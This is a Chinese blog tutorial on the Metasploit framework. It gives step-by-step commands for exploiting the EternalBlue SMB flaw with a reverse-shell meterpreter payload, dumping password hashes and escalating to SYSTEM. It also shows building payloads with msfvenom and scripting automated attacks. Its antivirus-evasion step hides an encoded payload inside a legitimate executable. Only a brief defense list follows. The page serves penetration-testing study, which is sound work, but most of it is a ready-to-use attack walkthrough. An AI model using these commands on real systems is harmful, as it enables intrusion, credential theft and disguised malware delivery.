黑客工具之——Metasploit(MSF)使用详解

于 2025-03-12 10:22:13 发布
阅读量909 收藏 18
点赞数 19
文章标签: 经验分享 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HT_xd/article/details/146195501
版权

一、Metasploit 简介

Metasploit 是一个开源的渗透测试框架,提供漏洞利用、Payload 生成、后渗透工具等功能,广泛应用于安全研究和渗透测试。其核心组件包括:

  • msfconsole:主命令行交互界面。
  • 模块:分为 exploitspayloadsauxiliarypost 等类型。
  • 数据库支持:存储扫描结果和攻击数据。

二、安装与配置

1. 安装 Metasploit

  • Kali Linux:安装过的,可以直接使用

打开kali Linux终端,输入msfconsole就能进入MSF操作页面

在这里插入图片描述

  • 其他系统的安装方式
    # Debian/Ubuntu
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall

# macOS (通过 Homebrew)
brew install metasploit

2. 初始化数据库

msfdb init      # 初始化数据库
msfconsole      # 启动控制台
db_status       # 检查数据库连接

三、基本命令与模块

1. 常用命令

命令说明
search [keyword]搜索模块(如 search eternalblue
use [module]选择模块(如 use exploit/windows/smb/ms17_010_eternalblue
show options查看模块所需参数
set [PARAM] [VALUE]设置参数(如 set RHOSTS 192.168.1.100
runexploit执行模块
sessions -l列出已建立的会话
sessions -i [ID]进入指定会话

2. 模块类型

模块类型说明示例路径
Exploit漏洞利用模块exploit/windows/smb/ms17_010_eternalblue
Payload攻击成功后执行的代码(如反向 Shell)payload/windows/meterpreter/reverse_tcp
Auxiliary辅助模块(扫描、嗅探等)auxiliary/scanner/smb/smb_version
Post后渗透模块(提权、信息收集等)post/windows/gather/credentials
Encoder编码 Payload 以绕过检测encoder/x86/shikata_ga_nai

四、实战示例:攻击 Windows SMB 漏洞(永恒之蓝)

步骤 1:选择 Exploit 模块

use exploit/windows/smb/ms17_010_eternalblue

步骤 2:配置参数

set RHOSTS 192.168.100.130    # 目标 IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp  # 选择 Payload
set LHOST 192.168.1.10      # 攻击者 IP(监听地址)
set LPORT 4444              # 监听端口

步骤 3:执行攻击

exploit

成功后会进入 meterpreter 会话。

五、Meterpreter 后渗透操作

常用命令

命令说明
sysinfo查看目标系统信息
getuid查看当前权限
hashdump提取用户哈希
screenshot截取屏幕截图
upload [本地文件] [远程路径]上传文件到目标
download [远程文件] [本地路径]下载文件到本地
shell进入系统命令行
run post/windows/gather/enum_logged_on_users枚举登录用户

提权操作

# 尝试提权到 SYSTEM
use post/windows/escalate/getsystem
run

六、高级技巧

1. 生成独立 Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.130 LPORT=4444 -f exe -o payload.exe

参数说明-p 指定 Payload,-f 指定输出格式,-o 输出文件。

2. 自动化攻击

使用 resource 脚本批量执行命令:

#  创建脚本文件 attack.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.100.130
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit -z
msfconsole -r attack.rc     #  执行脚本

3. 绕过杀毒软件(AV Evasion)

使用编码器和自定义模板:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.130 LPORT=4444 -e x86/shikata_ga_nai -i 5 -x legit_app.exe -f exe -o malicious.exe

七、防御措施

  1. 及时更新系统补丁:修复已知漏洞。
  2. 禁用不必要的服务:如 SMBv1。
  3. 部署防火墙/IDS:监控异常流量。
  4. 最小化权限原则:限制用户权限。
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 1242
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
Mac OSX系统下安装metasploit框架软件(MSF
热门推荐
LastTrainHome的博客
01-15 1万+
最近看《Metasploit渗透测试指南》,第二章开始有具体操作举例,于是准备在电脑上安装MSF终端用于测试。 MSF终端(msfconsole),一种Metasploit框架的用户接口。 首先到官网下载metasploit framework,我是Mac OSX10.11.2,64bit,对应下载链接:http://osx.metasploit.com/metasploitframework
windows及centos安装MSF(Metasploit)
SuperherRo的博客
08-22 2730
windows及centos安装MSF
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法),零基础入门到精通,看这篇就够了!赶紧收藏!
最新发布
baimao__Ch的博客
03-08 1332
Metasploit framework,简称msfMetasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
Linux(CentOS)安装msf
weixin_48878440的博客
09-15 2406
linux安装msf 安装metasploit centos安装msf 漏洞处理 信息安全
linux系统安装msf
初学者L_言的博客
05-17 7306
还是自己写下安装过程吧! 我的服务器系统是 Aliyun linux 1、下载安装 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 可能报错:Cou
【渗透测试框架】Metasploit-Framework(MSF)安装使用
李火火的安全圈
05-23 7618
文章目录前言一、Metasploit简介二、Metasploit安装及更新一键安装更新Metasploit三、Metasploit数据库连接四、Metasploit模块介绍Exploit模块Payload模块常见的几种 Stagers PayloadMeterpreter五、Metasploit实战攻击六、后渗透攻击阶段后渗透常用命令POST后渗透常用模块生成持续性后门程序Metasploit Socks代理PowerShell脚本(域内信息收集)加载stdapi升级会话SessionMeterpreter
【工具使用】——Metasploit(MSF)使用详解(超详细)
2401_84254343的博客
06-25 1320
show options #查看这个模块需要配置的信息exploitinfo: #查看这个漏洞的信息show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payloadset RHOST 192.168.100.158 #设置RHOST,也就是要攻击主机的ipset LHOST 192.168.100.132 #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4758
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
metasploit-framework-master.zip
09-08
Metasploit框架详解——渗透测试利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测和利用工具,广泛应用于网络安全评估和渗透测试。它由 Rapid7 维护,是全球黑客社区的重要资源,同时也是信息...
一些模块metasploit
08-08
Metasploit模块详解——基于MSF的渗透测试实践》 在网络安全领域,Metasploit(简称MSF)是一款广泛使用的开源渗透测试框架,它包含了大量预设的攻击模块,可帮助安全专家模拟黑客攻击行为,检测系统漏洞,并进行...
[知识小节]Linux上MSF工具的安装
网络安全知识分享
02-09 2433
vps上安装msf的过程 依次输入下面四个指令即可 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 777msf install ./msfinstall msfconsole ...
MSF安装使用教程,超详细,附安装包和密钥
顶峰
09-26 8051
MSF教程
windows及centos安装MSF(Metasploit)零基础入门到精通,收藏这一篇就够了
Python_0011的博客
07-15 1720
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布MSF时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。
渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装
zatongtong的博客
01-22 3510
Metasploit 渗透测试框架安装;渗透测试工具 MSF 安装MSF 升级导致 MSF 环境丢失
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2022
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
MSF使用与靶场安装
Cper的博客
10-22 1990
MSF的一些实操练习
msf安装使用基本操作
qq_56426046的博客
09-05 5307
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
【2023版】Metasploit(MSF)下载安装使用详解,永久免费使用,环境配置和使用技巧指南
QIANDXX的博客
12-29 5589
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用
Metasploit MSF实战教程:从安装到实战应用
Metasploit是一个被广泛用于网络安全和渗透测试领域的工具,它能够帮助安全专家、白帽黑客及研究人员发现计算机系统中的安全漏洞,并通过这些漏洞进行模拟攻击以测试系统安全性。Metasploit项目包括一个庞大的漏洞库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值